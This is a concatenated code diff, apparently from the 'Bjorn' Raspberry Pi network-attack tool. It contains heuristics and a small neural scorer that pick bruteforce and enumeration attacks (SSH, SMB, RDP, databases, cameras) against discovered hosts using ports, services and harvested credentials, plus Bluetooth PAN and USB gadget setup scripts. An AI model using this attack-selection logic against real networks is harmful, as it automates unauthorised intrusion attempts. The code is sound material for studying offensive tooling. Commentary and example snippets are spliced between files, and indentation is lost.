# ═══════════════════════════════════════════════════════════════════════
def _init_heuristics(self):
"""Initialize rule-based heuristics for cold start"""
self.heuristics = {
'port_based': {
22: ['SSHBruteforce', 'SSHEnumeration'],
80: ['WebEnumeration', 'WebVulnScan'],
443: ['WebEnumeration', 'SSLScan'],
445: ['SMBBruteforce', 'SMBEnumeration'],
3389: ['RDPBruteforce'],
21: ['FTPBruteforce', 'FTPEnumeration'],
23: ['TelnetBruteforce'],
3306: ['MySQLBruteforce'],
5432: ['PostgresBruteforce'],
1433: ['MSSQLBruteforce']
},
'service_based': {
'ssh': ['SSHBruteforce', 'SSHEnumeration'],
'http': ['WebEnumeration', 'WebVulnScan'],
'https': ['WebEnumeration', 'SSLScan'],
'smb': ['SMBBruteforce', 'SMBEnumeration'],
'ftp': ['FTPBruteforce', 'FTPEnumeration'],
'mysql': ['MySQLBruteforce'],
'postgres': ['PostgresBruteforce']
},
'profile_based': {
'camera': ['WebEnumeration', 'DefaultCredCheck', 'RTSPBruteforce'],
'nas': ['SMBBruteforce', 'WebEnumeration', 'SSHBruteforce'],
'web_server': ['WebEnumeration', 'WebVulnScan'],
'database': ['MySQLBruteforce', 'PostgresBruteforce'],
'linux_server': ['SSHBruteforce', 'WebEnumeration'],
'windows_server': ['SMBBruteforce', 'RDPBruteforce']
}
}
def _predict_with_heuristics(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
"""
try:
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
# Get ports and services
ports_str = host.get('ports', '') or ''
ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
services = self._get_services_for_host(mac)
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
# Find best action
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
# Clamp score to 0-1
best_score = min(best_score, 1.0)
debug_info = {
'method': 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
'all_scores': {k: v for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
# Ultimate fallback
if available_actions:
return available_actions[0], 0.1, {'method': 'fallback_first'}
return None, 0.0, {'method': 'no_actions'}
except Exception as e:
logger.error(f"Heuristic prediction failed: {e}")
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'error', 'error': str(e)}
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
@staticmethod
def _relu(x):
"""ReLU activation function"""
return np.maximum(0, x)
@staticmethod
def _sigmoid(x):
"""Sigmoid activation function"""
return 1.0 / (1.0 + np.exp(-x))
@staticmethod
def _softmax(x):
"""Softmax activation function"""
exp_x = np.exp(x - np.max(x)) # Numerical stability
return exp_x / exp_x.sum()
def _forward_network(self, input_vector: np.ndarray) -> np.ndarray:
"""
Forward pass through exported dense network with dynamic hidden depth.
Expected keys: w1/b1, w2/b2, ..., w_out/b_out
"""
a = input_vector
layer_idx = 1
while f'w{layer_idx}' in self.model_weights:
w = self.model_weights[f'w{layer_idx}']
b = self.model_weights[f'b{layer_idx}']
a = self._relu(np.dot(a, w) + b)
layer_idx += 1
return np.dot(a, self.model_weights['w_out']) + self.model_weights['b_out']
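The dynamic-depth forward pass above can be exercised on a toy weight dict. The 3→4→1 shapes below are made up for illustration, not taken from a real exported model:

```python
import numpy as np

def relu(x):
    return np.maximum(0, x)

def forward(weights, x):
    """Dense forward pass over w1/b1, w2/b2, ..., w_out/b_out keys,
    mirroring the layer-walking loop in _forward_network()."""
    a = x
    i = 1
    while f'w{i}' in weights:
        a = relu(a @ weights[f'w{i}'] + weights[f'b{i}'])
        i += 1
    return a @ weights['w_out'] + weights['b_out']

rng = np.random.default_rng(42)
weights = {
    'w1': rng.normal(size=(3, 4)), 'b1': np.zeros(4),
    'w_out': rng.normal(size=(4, 1)), 'b_out': np.zeros(1),
}
z = forward(weights, np.array([1.0, 0.0, 0.5]))  # single output logit
score = 1.0 / (1.0 + np.exp(-z[0]))              # sigmoid, as in the 1-neuron branch
```

A deeper export simply adds `w2`/`b2` (and so on) between `w1` and `w_out`; the loop picks the extra layers up without code changes.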
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
return [r['service'] for r in results if r.get('service')]
except Exception:
return []
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except Exception:
return []
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor (same as feature_logger)"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link'],
'iot': ['hikvision', 'dahua', 'axis'],
'nas': ['synology', 'qnap'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp'],
'virtualization': ['vmware', 'microsoft'],
'mobile': ['apple', 'samsung', 'huawei']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _detect_port_profile(self, ports) -> str:
"""Detect device profile from ports (same as feature_logger)"""
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000},
'web_server': {80, 443, 8080},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
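The overlap-scoring rule in `_detect_port_profile()` reduces to a small standalone function. This sketch uses a trimmed two-profile table purely for demonstration:

```python
def detect_profile(ports, profiles, min_overlap=2):
    """Return the profile whose signature ports overlap most with `ports`.

    Best overlap wins; fewer than `min_overlap` shared ports falls back
    to 'generic', matching the >= 2 threshold used above.
    """
    port_set = set(ports)
    best, best_overlap = 'generic', 0
    for name, sig in profiles.items():
        overlap = len(port_set & sig)
        if overlap > best_overlap:
            best, best_overlap = name, overlap
    return best if best_overlap >= min_overlap else 'generic'

profiles = {
    'windows_server': {135, 139, 445, 3389},
    'linux_server': {22, 80, 443},
}
# 22 and 80 hit two linux_server signature ports:
profile = detect_profile([22, 80, 8443], profiles)
```

The `min_overlap` threshold is what keeps a single shared port (e.g. just 22) from mislabeling a host; one match is too weak a signal.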
# ═══════════════════════════════════════════════════════════════════════
# STATISTICS
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get AI engine statistics"""
stats = {
'model_loaded': self.model_loaded,
'heuristics_available': True,
'decision_mode': 'neural_network' if self.model_loaded else 'heuristics'
}
if self.model_loaded and self.model_config:
stats.update({
'model_version': self.model_config.get('version'),
'model_trained_at': self.model_config.get('trained_at'),
'model_accuracy': self.model_config.get('accuracy'),
'training_samples': self.model_config.get('training_samples')
})
return stats
# ═══════════════════════════════════════════════════════════════════════════
# SINGLETON FACTORY
# ═══════════════════════════════════════════════════════════════════════════
def get_or_create_ai_engine(shared_data) -> Optional['BjornAIEngine']:
"""
Return the single BjornAIEngine instance attached to shared_data.
Creates it on first call; subsequent calls return the cached instance.
Use this instead of BjornAIEngine(shared_data) to avoid loading model
weights multiple times (orchestrator + scheduler + web each need AI).
"""
if getattr(shared_data, '_ai_engine_singleton', None) is None:
try:
shared_data._ai_engine_singleton = BjornAIEngine(shared_data)
except Exception as e:
logger.error(f"Failed to create BjornAIEngine singleton: {e}")
shared_data._ai_engine_singleton = None
return shared_data._ai_engine_singleton
def invalidate_ai_engine(shared_data) -> None:
"""Drop the cached singleton (e.g. after a mode reset or model update)."""
shared_data._ai_engine_singleton = None
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

ai_utils.py Normal file

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except Exception:
return "00:00:00:00:00:00"
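The MAC-formatting expression in `get_system_mac()` can be checked in isolation. The integers below are test values, not real device addresses:

```python
def format_mac(node):
    """Format a uuid.getnode()-style 48-bit integer as colon-separated
    hex pairs, using the same expression as get_system_mac()."""
    return ':'.join(('%012X' % node)[i:i + 2] for i in range(0, 12, 2))

mac = format_mac(0x001122334455)  # -> '00:11:22:33:44:55'
```

The `%012X` zero-padding matters: without it, addresses with leading zero octets would produce fewer than six pairs.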

bjorn_bluetooth.sh Normal file

@@ -0,0 +1,517 @@
#!/bin/bash
# bjorn_bluetooth_manager.sh
# Script to configure Bluetooth PAN for BJORN
# Usage: ./bjorn_bluetooth_manager.sh -f
# ./bjorn_bluetooth_manager.sh -u
# ./bjorn_bluetooth_manager.sh -l
# ./bjorn_bluetooth_manager.sh -h
# Author: Infinition
# Version: 1.1
# Description: This script configures and manages Bluetooth PAN for BJORN
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_manager_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
# Plain copy to the log file, single colored copy to the console
echo "$message" >> "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
"CYAN") echo -e "${CYAN}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "Failed: $1"
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install Bluetooth PAN"
echo -e " ${BLUE}-u${NC} Uninstall Bluetooth PAN"
echo -e " ${BLUE}-l${NC} List Bluetooth PAN Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install Bluetooth PAN"
echo -e " $0 -u Uninstall Bluetooth PAN"
echo -e " $0 -l List Bluetooth PAN Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== Bluetooth PAN Configuration Procedure =====${NC}"
echo -e "To configure the Bluetooth PAN driver and set the IP address, subnet mask, and gateway for the PAN network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the Bluetooth PAN, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart auto_bt_connect.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the PAN network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "${YELLOW}===== End of Procedure =====${NC}"
exit 1
}
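The IP configuration in step 1 of the procedure above can also be applied by hand for a quick test. This is a sketch only: it assumes the PAN interface comes up as `bnep0` and does not persist across reboots.

```shell
# Manual equivalent of step 1 (non-persistent; adjust the interface
# name if your kernel exposes the PAN link under a different one):
sudo ip addr add 172.20.2.1/24 dev bnep0
sudo ip link set bnep0 up

# Then verify from the host side as in step 4:
ping -c 3 172.20.2.1
```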
# ============================================================
# Function to Install Bluetooth PAN
# ============================================================
install_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Create settings directory
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
if [ ! -d "$SETTINGS_DIR" ]; then
mkdir -p "$SETTINGS_DIR"
check_success "Created settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR already exists. Skipping creation."
fi
# Create bt.json if it doesn't exist
BT_CONFIG="$SETTINGS_DIR/bt.json"
if [ ! -f "$BT_CONFIG" ]; then
log "INFO" "Creating Bluetooth configuration file at $BT_CONFIG"
cat << 'EOF' > "$BT_CONFIG"
{
"device_mac": "AA:BB:CC:DD:EE:FF"
}
EOF
check_success "Created Bluetooth configuration file at $BT_CONFIG"
log "WARNING" "Please edit $BT_CONFIG to include your Bluetooth device's MAC address."
else
log "INFO" "Bluetooth configuration file $BT_CONFIG already exists. Skipping creation."
fi
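    # For reference, bt.json must be strict JSON (comments are not allowed), e.g.:
    #   { "device_mac": "AA:BB:CC:DD:EE:FF" }
    # auto_bt_connect.py reads the "device_mac" key from this file via json.load().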
# Create auto_bt_connect.py
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
if [ ! -f "$BT_PY_SCRIPT" ]; then
log "INFO" "Creating Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
cat << 'EOF' > "$BT_PY_SCRIPT"
#!/usr/bin/env python3
import json
import subprocess
import time
import logging
import os
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
logging.basicConfig(filename="/var/log/auto_bt_connect.log", level=logging.INFO, format=LOG_FORMAT)
logger = logging.getLogger("auto_bt_connect")
CONFIG_PATH = "/home/bjorn/.settings_bjorn/bt.json"
CHECK_INTERVAL = 30 # Interval in seconds between each check
def ensure_bluetooth_service():
try:
res = subprocess.run(["systemctl", "is-active", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        if res.stdout.strip() != "active":
logger.info("Bluetooth service not active. Starting and enabling it...")
start_res = subprocess.run(["systemctl", "start", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if start_res.returncode != 0:
logger.error(f"Failed to start bluetooth service: {start_res.stderr}")
return False
enable_res = subprocess.run(["systemctl", "enable", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if enable_res.returncode != 0:
logger.error(f"Failed to enable bluetooth service: {enable_res.stderr}")
# Not fatal, but log it.
else:
logger.info("Bluetooth service enabled successfully.")
else:
logger.info("Bluetooth service is already active.")
return True
except Exception as e:
logger.error(f"Error ensuring bluetooth service: {e}")
return False
def is_already_connected():
# Check if bnep0 interface is up with an IP
ip_res = subprocess.run(["ip", "addr", "show", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if ip_res.returncode == 0 and "inet " in ip_res.stdout:
# bnep0 interface exists and has an IPv4 address
logger.info("bnep0 is already up and has an IP. No action needed.")
return True
return False
def run_in_background(cmd):
# Run a command in background, return the process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
return process
def establish_connection(device_mac):
# Attempt to run bt-network
logger.info(f"Attempting to connect PAN with device {device_mac}...")
bt_process = run_in_background(["bt-network", "-c", device_mac, "nap"])
# Wait a bit for PAN to set up
time.sleep(3)
# Check if bt-network exited prematurely
if bt_process.poll() is not None:
# Process ended
if bt_process.returncode != 0:
stderr_output = bt_process.stderr.read() if bt_process.stderr else ""
logger.error(f"bt-network failed: {stderr_output}")
return False
else:
logger.warning("bt-network ended immediately. PAN may not be established.")
return False
else:
logger.info("bt-network running in background...")
# Now run dhclient for IPv4
dh_res = subprocess.run(["dhclient", "-4", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if dh_res.returncode != 0:
logger.error(f"dhclient failed: {dh_res.stderr}")
return False
logger.info("Successfully obtained IP on bnep0. PAN connection established.")
return True
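# For debugging, the manual equivalent of establish_connection() above is
# (a sketch; substitute the peer MAC address configured in bt.json):
#   bt-network -c AA:BB:CC:DD:EE:FF nap &
#   dhclient -4 bnep0
#   ip addr show bnep0   # should now carry an IPv4 address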
def load_config():
if not os.path.exists(CONFIG_PATH):
logger.error(f"Config file {CONFIG_PATH} not found.")
return None
try:
with open(CONFIG_PATH, "r") as f:
config = json.load(f)
device_mac = config.get("device_mac")
if not device_mac:
logger.error("No device_mac found in config.")
return None
return device_mac
except Exception as e:
logger.error(f"Error loading config: {e}")
return None
def main():
device_mac = load_config()
if not device_mac:
return
while True:
try:
if not ensure_bluetooth_service():
logger.error("Bluetooth service setup failed.")
elif is_already_connected():
# Already connected and has IP, do nothing
pass
else:
# Attempt to establish connection
success = establish_connection(device_mac)
if not success:
logger.warning("Failed to establish PAN connection.")
except Exception as e:
logger.error(f"Unexpected error in main loop: {e}")
# Wait before the next check
time.sleep(CHECK_INTERVAL)
if __name__ == "__main__":
main()
EOF
check_success "Created Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
else
log "INFO" "Bluetooth auto-connect Python script $BT_PY_SCRIPT already exists. Skipping creation."
fi
# Make the Python script executable
chmod +x "$BT_PY_SCRIPT"
check_success "Made Python script executable at $BT_PY_SCRIPT"
# Create the systemd service
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
if [ ! -f "$BT_SERVICE" ]; then
log "INFO" "Creating systemd service at $BT_SERVICE"
cat << 'EOF' > "$BT_SERVICE"
[Unit]
Description=Auto Bluetooth PAN Connect
After=network.target bluetooth.service
Wants=bluetooth.service
[Service]
Type=simple
ExecStart=/usr/local/bin/auto_bt_connect.py
Restart=on-failure
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
check_success "Created systemd service at $BT_SERVICE"
else
log "INFO" "Systemd service $BT_SERVICE already exists. Skipping creation."
fi
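# To inspect the unit after installation (example commands, not run by this script):
#   systemctl status auto_bt_connect.service --no-pager
#   journalctl -u auto_bt_connect.service -n 20
#   tail -n 20 /var/log/auto_bt_connect.log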
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Enable and start the service
systemctl enable auto_bt_connect.service
check_success "Enabled auto_bt_connect.service"
systemctl start auto_bt_connect.service
check_success "Started auto_bt_connect.service"
echo -e "${GREEN}Bluetooth PAN installation completed successfully. A reboot is required for changes to take effect.${NC}"
}
# ============================================================
# Function to Uninstall Bluetooth PAN
# ============================================================
uninstall_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
BT_CONFIG="$SETTINGS_DIR/bt.json"
# Stop and disable the service
if systemctl is-active --quiet auto_bt_connect.service; then
systemctl stop auto_bt_connect.service
check_success "Stopped auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not running."
fi
if systemctl is-enabled --quiet auto_bt_connect.service; then
systemctl disable auto_bt_connect.service
check_success "Disabled auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not enabled."
fi
# Remove the systemd service file
if [ -f "$BT_SERVICE" ]; then
rm "$BT_SERVICE"
check_success "Removed $BT_SERVICE"
else
log "INFO" "$BT_SERVICE does not exist. Skipping removal."
fi
# Remove the Python script
if [ -f "$BT_PY_SCRIPT" ]; then
rm "$BT_PY_SCRIPT"
check_success "Removed $BT_PY_SCRIPT"
else
log "INFO" "$BT_PY_SCRIPT does not exist. Skipping removal."
fi
# Remove Bluetooth configuration directory and file
if [ -d "$SETTINGS_DIR" ]; then
rm -rf "$SETTINGS_DIR"
check_success "Removed settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR does not exist. Skipping removal."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "SUCCESS" "Bluetooth PAN uninstallation completed successfully."
}
# ============================================================
# Function to List Bluetooth PAN Information
# ============================================================
list_bluetooth_pan_info() {
echo -e "${CYAN}===== Bluetooth PAN Information =====${NC}"
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
BT_CONFIG="/home/bjorn/.settings_bjorn/bt.json"
# Check status of auto_bt_connect.service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q auto_bt_connect.service; then
systemctl status auto_bt_connect.service --no-pager
else
echo -e "${RED}auto_bt_connect.service is not installed.${NC}"
fi
# Check if Bluetooth auto-connect Python script exists
echo -e "\n${YELLOW}Bluetooth Auto-Connect Script:${NC}"
if [ -f "$BT_PY_SCRIPT" ]; then
echo -e "${GREEN}$BT_PY_SCRIPT exists.${NC}"
else
echo -e "${RED}$BT_PY_SCRIPT does not exist.${NC}"
fi
# Check Bluetooth configuration file
echo -e "\n${YELLOW}Bluetooth Configuration File:${NC}"
if [ -f "$BT_CONFIG" ]; then
echo -e "${GREEN}$BT_CONFIG exists.${NC}"
echo -e "${CYAN}Contents:${NC}"
cat "$BT_CONFIG"
else
echo -e "${RED}$BT_CONFIG does not exist.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Bluetooth PAN Manager Menu ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List Bluetooth PAN Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_bluetooth_pan_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting Bluetooth PAN Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_bluetooth_pan
exit 0
;;
u)
uninstall_bluetooth_pan
exit 0
;;
l)
list_bluetooth_pan_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

bjorn_usb_gadget.sh Normal file

@@ -0,0 +1,567 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
